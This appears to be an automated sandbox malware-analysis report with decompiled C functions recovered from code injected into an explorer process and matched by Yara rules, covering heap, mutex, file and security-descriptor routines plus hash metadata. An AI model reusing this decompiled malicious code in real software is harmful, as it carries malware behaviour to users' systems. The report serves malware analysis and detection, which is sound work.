                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				long _t15;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        
                                                                                                                                                                        				_t15 = 2;
                                                                                                                                                                        				_t5 = E007AB2BA(_a4, _t15);
                                                                                                                                                                        				_t17 = _t5;
                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                        					_t6 = E007AB31F(_t17, _a8, _a12); // executed
                                                                                                                                                                        					if(_t6 != 0) {
                                                                                                                                                                        						FindCloseChangeNotification(_t17);
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t10 = 0xfffffffe;
                                                                                                                                                                        					return _t10;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t5 | 0xffffffff;
                                                                                                                                                                        			}









                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 10ba9805bed1e1e4c4e5ca4cd5d02011e00ba5baa56e6fe4fe76ce633b4a710e
                                                                                                                                                                        • Instruction ID: b3548f7149db5f03b72e1fb366b3df81cdf3ecf5deb6827ae1e60123487f71a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 10ba9805bed1e1e4c4e5ca4cd5d02011e00ba5baa56e6fe4fe76ce633b4a710e
                                                                                                                                                                        • Instruction Fuzzy Hash: 59E09232604665ABCB115A68AC15E9E3749EFCE770B208712F9258B2D3DB38D90142D0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007AC164(void* __ecx) {
                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                        				void* _t5;
                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        
                                                                                                                                                                        				_t4 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				_t13 = 0;
                                                                                                                                                                        				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
                                                                                                                                                                        				_t12 = _t5;
                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                        					_t6 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_push(_t12);
                                                                                                                                                                        					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
                                                                                                                                                                        						_t13 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					FindCloseChangeNotification(_t12);
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t5;
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,007A42E1), ref: 007AC197
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: e90e2305056be8c8a0a8e109809275cc99ad591c81ab72ef58618c2f5859cc6f
                                                                                                                                                                        • Instruction ID: 895c58a96f7cfca53e382ac038189fff34c4262c54956f3cb45770cc9c0d6fd4
                                                                                                                                                                        • Opcode Fuzzy Hash: e90e2305056be8c8a0a8e109809275cc99ad591c81ab72ef58618c2f5859cc6f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE048323015216BD3114765FC4DFA77BA9DBCAE51B058378F509C7151CB248843C7E4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007A3067(WCHAR* __ecx, void* __eflags) {
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t1;
                                                                                                                                                                        				int _t3;
                                                                                                                                                                        				void* _t5;
                                                                                                                                                                        				WCHAR* _t8;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 = __ecx;
                                                                                                                                                                        				_t1 = E007AC093(__ecx);
                                                                                                                                                                        				if(_t1 != 0) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t3 = CreateDirectoryW(__ecx, _t1); // executed
                                                                                                                                                                        					if(_t3 != 0) {
                                                                                                                                                                        						if(E007AC093(_t8) != 0) {
                                                                                                                                                                        							goto L6;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_push(0xfffffffd);
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push(0xfffffffe);
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_pop(_t5);
                                                                                                                                                                        						return _t5;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}








                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AC093: GetFileAttributesW.KERNELBASE(00000000,007A5445,00000000,00000000), ref: 007AC099
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,007A328A,00000000), ref: 007A3075
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3401506121-0
                                                                                                                                                                        • Opcode ID: e19ff73db955005fef388af90ae6833a573276f2b5fb2d863e2b0d01b7df3b77
                                                                                                                                                                        • Instruction ID: b971270eb213075591304f5b820d7f0aa7683040c535dab66708d1ef749b4113
                                                                                                                                                                        • Opcode Fuzzy Hash: e19ff73db955005fef388af90ae6833a573276f2b5fb2d863e2b0d01b7df3b77
                                                                                                                                                                        • Instruction Fuzzy Hash: 91D05E21208221A52A216A797C08AAB128A8DD323472403B6F826D16C0EA0CCE410881
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AA108() {
                                                                                                                                                                        				signed int _t3;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = CreateMutexA(0, 0, 0);
                                                                                                                                                                        				 *0x7bf904 = _t3;
                                                                                                                                                                        				if(_t3 == 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return _t3 | 0xffffffff;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t3 = E007A8BDE(0x1000);
                                                                                                                                                                        					 *0x7bf908 = _t3;
                                                                                                                                                                        					if(_t3 == 0) {
                                                                                                                                                                        						goto L3;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *0x7bf90c = 0;
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00000000,00000001,007A5C6F,?,007A6009), ref: 007AA113
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCreateHeapMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3814785936-0
                                                                                                                                                                        • Opcode ID: e8e4cddedc58dba5221e62048c2ac1e69ab43bdd6d95b9718d1fcafd715af275
                                                                                                                                                                        • Instruction ID: b6adb80eeba1215f227e7161f11d55094222e13a1543c5a5574efc3d321e1e81
                                                                                                                                                                        • Opcode Fuzzy Hash: e8e4cddedc58dba5221e62048c2ac1e69ab43bdd6d95b9718d1fcafd715af275
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE086711065297A93505F7ABC04FC33B94EB427707008335F014C5190DB3CE441C7E5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                        			E007A5BEA(void* __edx) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        				void* _t4;
                                                                                                                                                                        				void* _t11;
                                                                                                                                                                        
                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                        				_t2 = E007AA96C(0x3e); // executed
                                                                                                                                                                        				if(_t2 == 0xffffffff) {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t4 = E007AF457(_t11); // executed
                                                                                                                                                                        						_push(1);
                                                                                                                                                                        						if(_t4 > 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						SleepEx(0x3e8, ??);
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x3f);
                                                                                                                                                                        					E007AAA65();
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • SleepEx.KERNELBASE(000003E8,00000001), ref: 007A5C03
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 379ad62fff78c9fca127673d2c78c6a39ef72c5fe23eba3c93c0d6df864c2158
                                                                                                                                                                        • Instruction ID: ab824983d638e6d09c25e320d38570724e1871e8f3d7ed1957a826741e9ae602
                                                                                                                                                                        • Opcode Fuzzy Hash: 379ad62fff78c9fca127673d2c78c6a39ef72c5fe23eba3c93c0d6df864c2158
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D05B622447429AE10563B46D0BF5512845BC2B70F208335F311CD0D2DF588580C736
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E007AB2FE(WCHAR* __ecx) {
                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                        
                                                                                                                                                                        				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                        				_t2 = _t5 + 1; // 0x1
                                                                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                                                                        				return _t5 &  ~_t2;
                                                                                                                                                                        			}




                                                                                                                                                                        0x007ab312
                                                                                                                                                                        0x007ab315
                                                                                                                                                                        0x007ab31a
                                                                                                                                                                        0x007ab31e

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,007AB3E6,00000000,00000400,00000000,00000000,?,007B0BBE,00000000,00000000), ref: 007AB312
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 63d9c5b6a56aa0ff83c3e8320f974b020df148baf94d4186c019922f9c9cdb7c
                                                                                                                                                                        • Instruction ID: d76f277cf009c0e7db6f4d2dec3d48cf52379f16e8efa4b2d52babe21a986810
                                                                                                                                                                        • Opcode Fuzzy Hash: 63d9c5b6a56aa0ff83c3e8320f974b020df148baf94d4186c019922f9c9cdb7c
                                                                                                                                                                        • Instruction Fuzzy Hash: BCD012B13601007EFB1C8B24DC57F71339CD704701F11426C7A02D60E0C669D9448714
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007A5057() {
                                                                                                                                                                        				signed int _t3;
                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = FindCloseChangeNotification( *0x7bf8e0);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				_t5 =  !( ~_t3);
                                                                                                                                                                        				 *0x7bf8e0 =  *0x7bf8e0 & _t5;
                                                                                                                                                                        				return _t5;
                                                                                                                                                                        			}






                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(007A5619,?,?,?,?,?,?,?,?,00000000,00000000), ref: 007A5062
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: c3f2672b00983ca68ed81a22b7a75b3398994c890ca7ca961dadab8e16edb31d
                                                                                                                                                                        • Instruction ID: e251ce550efe5ae7ca21c8e2e182e2e95347da389cefb37b580cbacaf16b81b4
                                                                                                                                                                        • Opcode Fuzzy Hash: c3f2672b00983ca68ed81a22b7a75b3398994c890ca7ca961dadab8e16edb31d
                                                                                                                                                                        • Instruction Fuzzy Hash: BCC048752A00018F8B00AB79FC06E6036E0F704B42300ABB0E001C2070DB2D8840AA08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AC093(WCHAR* __ecx) {
                                                                                                                                                                        
                                                                                                                                                                        				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                                                                                                                                                        			}



                                                                                                                                                                        0x007ac0a9

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,007A5445,00000000,00000000), ref: 007AC099
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 6765c3ef2bfaac3f0ea8b84081d3b23634603259e84cd564998e944fef7e873e
                                                                                                                                                                        • Instruction ID: eb7b0cbda10cfc3b4f88ea1b71d492454cb2ae4c151d6022b66d7d4ce336c93f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6765c3ef2bfaac3f0ea8b84081d3b23634603259e84cd564998e944fef7e873e
                                                                                                                                                                        • Instruction Fuzzy Hash: FFB092B62204014BC7184738AC89A9D3290AB08621B2587B8B123C60E0DB34C9919B00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BDE(long _a4) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 = RtlAllocateHeap( *0x7bf900, 8, _a4); // executed
                                                                                                                                                                        				return _t2;
                                                                                                                                                                        			}




                                                                                                                                                                        0x007a8bec
                                                                                                                                                                        0x007a8bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BC9() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                        				 *0x7bf900 = _t1;
                                                                                                                                                                        				return _t1;
                                                                                                                                                                        			}




                                                                                                                                                                        0x007a8bd2
                                                                                                                                                                        0x007a8bd8
                                                                                                                                                                        0x007a8bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,007A6502), ref: 007A8BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E007ACB77() {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				short _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				short _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                        				void* _v76;
                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				char _v96;
                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				intOrPtr _t62;
                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                        				void* _t92;
                                                                                                                                                                        
                                                                                                                                                                        				_v28 = 0xf00;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                        				_t92 = 0;
                                                                                                                                                                        				_v20 = 0x100;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				E007A8D6D( &_v96, 0, 0x20);
                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(1);
                                                                                                                                                                        				_push( &_v24);
                                                                                                                                                                        				_t57 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        				if( *((intOrPtr*)(_t57 + 0xc))() == 0) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                        						_t66 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						 *((intOrPtr*)(_t66 + 0x10))(_v8);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                        						_t64 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						 *((intOrPtr*)(_t64 + 0x10))(_v12);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t92 != 0) {
                                                                                                                                                                        						_t62 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t62 + 0x34))(_t92);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                        						_t60 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t60 + 0x34))(_v16);
                                                                                                                                                                        					}
                                                                                                                                                                        					L22:
                                                                                                                                                                        					return _t92;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v68 = _v12;
                                                                                                                                                                        				_t69 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t88 = 2;
                                                                                                                                                                        				_v96 = 0x1fffff;
                                                                                                                                                                        				_v92 = _t88;
                                                                                                                                                                        				_v88 = 3;
                                                                                                                                                                        				_v76 = 0;
                                                                                                                                                                        				_v72 = 5;
                                                                                                                                                                        				if( *((intOrPtr*)(_t69 + 4)) != 6 ||  *((intOrPtr*)(_t69 + 8)) < _t88) {
                                                                                                                                                                        					if( *((intOrPtr*)(_t69 + 4)) < 0xa) {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(1);
                                                                                                                                                                        					_push(_t88);
                                                                                                                                                                        					_push(_t88);
                                                                                                                                                                        					_push( &_v32);
                                                                                                                                                                        					_t84 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					if( *((intOrPtr*)(_t84 + 0xc))() == 0) {
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t86 = _v8;
                                                                                                                                                                        						if(_t86 != 0) {
                                                                                                                                                                        							_push(2);
                                                                                                                                                                        							_pop(1);
                                                                                                                                                                        							_v64 = 0x1fffff;
                                                                                                                                                                        							_v60 = 1;
                                                                                                                                                                        							_v56 = 3;
                                                                                                                                                                        							_v44 = 0;
                                                                                                                                                                        							_v40 = 1;
                                                                                                                                                                        							_v36 = _t86;
                                                                                                                                                                        						}
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_push( &_v16);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push( &_v96);
                                                                                                                                                                        						_t72 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						_push(1); // executed
                                                                                                                                                                        						if( *((intOrPtr*)(_t72 + 8))() != 0) {
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t92 = LocalAlloc(0x40, 0x14);
                                                                                                                                                                        						if(_t92 == 0) {
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t89 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						_push(1);
                                                                                                                                                                        						_push(_t92);
                                                                                                                                                                        						if( *((intOrPtr*)(_t89 + 0x90))() == 0) {
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t76 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_v16);
                                                                                                                                                                        						_push(1);
                                                                                                                                                                        						_push(_t92);
                                                                                                                                                                        						if( *((intOrPtr*)(_t76 + 0x94))() == 0) {
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v8 != 0) {
                                                                                                                                                                        							_t80 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        							 *((intOrPtr*)(_t80 + 0x10))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t78 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						 *((intOrPtr*)(_t78 + 0x10))(_v12);
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 007ACC6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocalmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1202173703-0
                                                                                                                                                                        • Opcode ID: 956f326c1d0017608e611382df8f0d2b98185e7d05aa8f98525555e4a0b4f920
                                                                                                                                                                        • Instruction ID: 271a52d1cb8239bb49811708ef8bab29e4366ecd2e30611a06f5288a42e412bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 956f326c1d0017608e611382df8f0d2b98185e7d05aa8f98525555e4a0b4f920
                                                                                                                                                                        • Instruction Fuzzy Hash: FC511971900208EFDB11DF99DC88EADBBF8BF49710F14826AE515E7261D3749A01CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E007B0B23(void* __edx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                        				char _t28;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				char _t38;
                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                        				char _t42;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t79;
                                                                                                                                                                        
                                                                                                                                                                        				_t27 =  *0x7bf7e4; // 0xeafb48
                                                                                                                                                                        				_t28 = E007A8BDE( *((intOrPtr*)(_t27 + 4))); // executed
                                                                                                                                                                        				_v12 = _t28;
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					_t61 =  *0x7bf7e4; // 0xeafb48
                                                                                                                                                                        					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
                                                                                                                                                                        						E007A8CBB(_t28,  *_t61, 0x400);
                                                                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                                                                        						_t37 = E007A109A(_t61, 0x294);
                                                                                                                                                                        						_t64 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        						asm("sbb ecx, ecx");
                                                                                                                                                                        						_t38 = E007A9DF2(( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8, ( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t37);
